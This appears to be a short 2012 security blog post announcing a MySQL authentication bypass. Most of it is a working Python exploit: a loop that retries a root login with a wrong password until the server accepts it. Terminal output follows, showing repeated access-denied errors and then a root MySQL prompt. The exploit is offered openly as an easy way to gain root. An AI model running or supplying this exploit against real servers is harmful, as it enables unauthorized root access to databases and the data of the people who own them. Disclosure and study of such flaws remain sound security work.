June 24, 2012
Massive MYSQL Authentication Bypass Exploit
Written by
David Kennedy
Penetration Testing
Security Testing & Analysis
There has been a new MYSQL authentication bypass exploit released on seclist here: http://seclists.org/oss-sec/2012/q2/493. It is absolutely trivial to gain root access to a MySQL database at this point. Thanks to jduck for the tweet bringing this to our attention.
Easy python script to gain root access to MySQL:
#!/usr/bin/python
import subprocess
while 1: subprocess.Popen("mysql -u root mysql --password=blah",
shell=True).wait()
Below running the command:
relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
mysql>